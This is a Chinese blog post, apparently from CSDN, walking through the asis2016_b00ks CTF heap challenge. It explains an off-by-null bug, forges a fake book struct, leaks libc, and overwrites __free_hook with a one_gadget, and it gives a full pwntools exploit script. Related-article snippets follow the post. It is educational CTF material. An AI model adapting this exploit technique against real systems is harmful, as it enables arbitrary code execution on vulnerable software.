【off by null】asis2016_b00ks

最新推荐文章于 2023-10-02 12:42:32 发布
最新推荐文章于 2023-10-02 12:42:32 发布
阅读量267 收藏
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huzai9527/article/details/116766173
版权
CTF 同时被 2 个专栏收录
43 篇文章 0 订阅
订阅专栏
HEAP
17 篇文章 0 订阅
订阅专栏

【off by null】asis2016_b00ks

1. ida分析

  1. 在设置author name的时候存在off by null,输入32个字符后,会在后面添加\x00,author name 紧接着 booklist,当author name输入32字符后,创建一个book会覆盖\x00,此时print book会泄露book[0]的地址。

    在这里插入图片描述

2. 思路

  1. 设置author name的长度为32(最后的\x00会被后创建的book[0]覆盖)

  2. 创建两个book,第二个book足够大(泄露libc的基址)

    在这里插入图片描述

  3. print book,泄露book[0]的地址

    在这里插入图片描述

  4. 再次修改author name的长度仍然为32(将book[0]的最后一个字节覆盖为\x00),此时可以在book[0]的describe中构建一个fake book

    在这里插入图片描述

    在这里插入图片描述

  5. fake book的describe指向book[1]的describe指针

    在这里插入图片描述

  6. 再次print book,此时book[0]的describe能够泄露libc的基址

  7. 修改book[0]的describe为__free_hook的地址,即book[1]的describe指针指向__free_hook

  8. 修改book[1]的describe为onegadget

    在这里插入图片描述

  9. delete book[2],触发onegadget

3. exp

from pwn import *

p = process('./b00ks')
#p = remote('node3.buuoj.cn',26066)
libc = ELF('./libc-2.27 .buu.so')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
context.log_level = 'debug'
def create_name(author):
    p.recvuntil('name: ')
    p.sendline(author)

def create_book(name_size,name,des_size,des):
    p.recvuntil("> ")
    p.sendline('1')
    p.sendafter('name size: ',str(name_size)+'\n')
    p.sendafter('s): ',name+'\n')
    p.sendafter('on size: ',str(des_size)+'\n')
    p.sendafter('on: ',des+'\n')

def print_book(id):
    p.recvuntil('> ')
    p.sendline('4')
    for i in range(int(id)):
        p.recvuntil(':')
        book_id = p.recvline()[:-1]
        p.recvuntil(': ')
        book_name = p.recvline()[:-1]
        p.recvuntil(': ')
        book_des = p.recvline()[:-1]
        p.recvuntil(': ')
        book_author = p.recvline()[:-1]
    return book_id,book_name,book_des,book_author

def change_name(author):
    p.recvline('> ')
    p.sendline('5')
    p.sendafter(': ',author+'\n')

def edit_book(book_id,content):
    p.recvline('> ')
    p.sendline('3')
    p.sendafter('edit: ',str(book_id)+'\n')
    p.sendafter('ion: ',content+'\n')

def delete_book(book_id):
    p.recvuntil("> ")
    p.sendline("2")
    p.recvuntil(": ")
    p.sendline(str(book_id))
create_name('A'*32)
#gdb.attach(p)
#pause()
create_book(0x20,'AAAA',140,'B')
create_book(0x20,'CCCC',0x21000,'DDDD')
#gdb.attach(p)
#pause()
book_id,book_name,book_des,book_author = print_book(1)
book_addr = u64(book_author[32:32+6].ljust(8,'\x00'))
log.success('book_addr = '+hex(book_addr))
payload = 'b'*0x60 + p64(1) + p64(book_addr+0x68) + p64(book_addr + 0x70) + p64(0xffff)
#gdb.attach(p)
#pause()
edit_book(1,payload)
change_name('A'*32)
p.recv()
p.sendline('4')
#book_id,book_name,book_des,book_author = print_book(1)
p.recvuntil('Description: ')
book2_des_addr = u64(p.recv(6).ljust(8,'\x00'))
log.success('book2_des_addr==>'+hex(book2_des_addr))
libc_base = book2_des_addr - 0x5e0010
log.success('libc_base==>'+hex(libc_base))

free_hook = libc_base + libc.sym['__free_hook']
one = libc_base + 0x4f432 #0x4f322
log.success('free_hook==>'+hex(free_hook))
log.success('one==>'+hex(one))
gdb.attach(p)
pause()
edit_book(1,p64(free_hook))
edit_book(2,p64(one))
gdb.attach(p)
delete_book(2)
p.interactive()
huzai9527
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
asis2016-b00ks
40KO的博客
06-02 723
off-by-one 本题主要是堆上面的off-by-one漏洞利用。off-by-one的成因主要是输入边界考虑不周导致的单字节溢出。一种利用方式是通过修改chunk大小造成结构块之间的重叠,本题就是这种利用方式。 程序分析 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { __int64 savedreg...
Asis CTF 2016 b00ks
Morphy_Amo的博客
02-22 3382
例题 Asis CTF 2016 b00ks ` 题目链接 1. 安全策略 [*] '/root/ctf/Other/pwn/heap/b00ks' Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled 开启了full RELRO,因此无法直接进行GOT表劫持。开启了PIE,也导致不能直接用
asis2016_b00ks
z1r0的博客
03-21 533
asis2016_b00ks 查看保护 这个看上去很正常,跟进一下read_input 可以看到一个off-by-null漏洞。 这里的作者的名字和heap_ptr贴在了一起 攻击思路:一个off-by-null,看一下可不可以从author_addr这里入手 因为heap_ptr和author_addr贴在了一起,而read_input有一个off-by-null,可以通过change_author_name来使得heap_ptr低一字节被改在\x00。这里还有一个知识点,一开始输入0x20个数
asis2016_b00ks --堆的off-by-null
kissyunlei的博客
02-17 545
非常典型的off-by-null题,思路清晰,结构体指向难找,欢迎师傅们来看
[堆入门off-by-null]asis2016_b00ks
Nashi_Ko的博客
12-02 1276
[BUUCTF] asis2016_b00ks 堆入门off-by-null 刚开始学pwn就听说,堆的题目很魔幻,需要大量的基础知识。在漫长地啃堆基础原理以后,这是我第一次自己研究学习并且完全明白原理的堆题。特地在此做笔记记录。 0x00 逆向分析 一进来就很容易发现,这也是堆题中最为常见的菜单题目。 简单分析一下,打开程序,最先产生交互的函数是sub_B6D。 调用了sub_9F5函数,是作者自己写的read函数,再进去看看。 注意这里的判定:先++buf,然后判断是否达到了最大长度(32字符),
asis2完整版
03-21
【asis2完整版】指的是Apache Axis2的完整版本,它是一个高效的、可扩展的Web服务(Web Service)引擎。Apache Axis2是Axis1的下一代产品,专注于提供高性能、灵活且模块化的Web服务解决方案。 Web服务是一种通过...
ASIS Certified Protection Professional(ASIS-CPP)认证考试题库.docx
07-05
ASIS Certified Protection Professional(ASIS-CPP)认证考试题库
ASIS for GNAT-开源
05-15
gcc上用于GNAT的ASIS(Ada语义接口规范)。 ASIS是已发布的国际ISO标准(ISO / IEC 15291:1999)。 也可以使用基于ASIS的工具。
Chinese Std GBT7714 (numeric) AsIs.ens
08-22
解决endNote中使用GB/T 7714-2015格式导出时作者名字全是大写的问题,可以和博客https://blog.csdn.net/dream6985/article/details/124794353配套使用。
tomcat_apache共享动态连接库
09-03
LoadModule asis_module modules/mod_asis.so LoadModule info_module modules/mod_info.so LoadModule cgi_module modules/mod_cgi.so LoadModule dav_fs_module modules/mod_dav_fs.so LoadModule vhost_alias_...
Asis CTF 2016——b00ks
04-18 356
这程序是一个图书管理系统  #off-by-one 程序逻辑 1 __int64 __fastcall main(__int64 a1, char **a2, char **a3) 2 { 3 struct _IO_FILE *v3; // rdi 4 __int64 savedregs; // [rsp+20h] [rbp+0h] 5 6 ...
buu刷题日记 asis2016_b00ks
qq_51474381的博客
05-18 514
1.漏洞点 一个off by null,但和其他堆题的利用不太一样。 输入name时可覆盖heaplist的最低位为0 2.利用思路 1.泄露heap地址 申请大的heap再free掉,show功能正常,直接泄露。 2.泄露libc && 改__free_hook heaplist的第一个指针最低位可覆盖为0,在对应位置伪造结构体,再结合edit和show功能实现任意读写,改freehook为system。 3.shell 申请时写入‘/bin/sh\x00’再
[Asis CTF 2016] b00ks —— Off-By-One笔记与思考
Tokameine的博客
09-13 1253
前言: 这道题做得有点痛苦......因为本地通常都很难和服务器有相同的环境,使用mmap开辟空间造成的偏移会因此而变得麻烦,并且free_hook周围很难伪造chunk,一度显然恐慌...... 不过本来应该很早就开始Off-By-One的学习的,竟然现在才注意到......惭愧 正文: book结构: struct book { int id; char *name; char *description; in...
Asis CTF 2016 b00ks(堆溢出NULL byte off-by-one)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-21 1385
Asis CTF 2016 b00ks1.题目获取2.查保护3.分析程序4.地址泄露泄露地址修改地址5.伪造结构体 1.题目获取 题目下载地址:点此下载 2.查保护 3.分析程序 IDA载入,查看main函数 这个函数读取一个名字,最长32个字节。 作者名被读到data段 sub_A89()打印程序功能,并获取用户输入的序号 sub_F55()的功能是添加书籍信息,在这个函数中可以分析到...
Asis CTF 2016 b00ks理解
weixin_30666753的博客
03-05 283
---恢复内容开始--- 最近在学习堆的off by one,其中遇到这道题,萌新的我弄了大半天才搞懂,网上的很多wp都不是特别详细,都得自己好好调试。 首先,这题目是一个常见的图书馆管理系统,虽然我没见过。 1. Create a book 2. Delete a book 3. Edit a book 4. Print book detail 5. Change ...
[PWN] BUUCTF asis2016_b00ks Offbynull利用
LDX的博客
10-02 144
堆 Offbyone 劫持free_hook
ASIS+Quals
最新发布
10-18
ASIS是Ada语义接口规范,它是已发布的国际ISO标准(ISO / IEC 15291:1999)。它提供了一种机制,使得可以在Ada程序中访问和操作程序的语法和语义信息。ASIS可以用于许多应用程序,例如代码分析、代码转换、代码生成...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值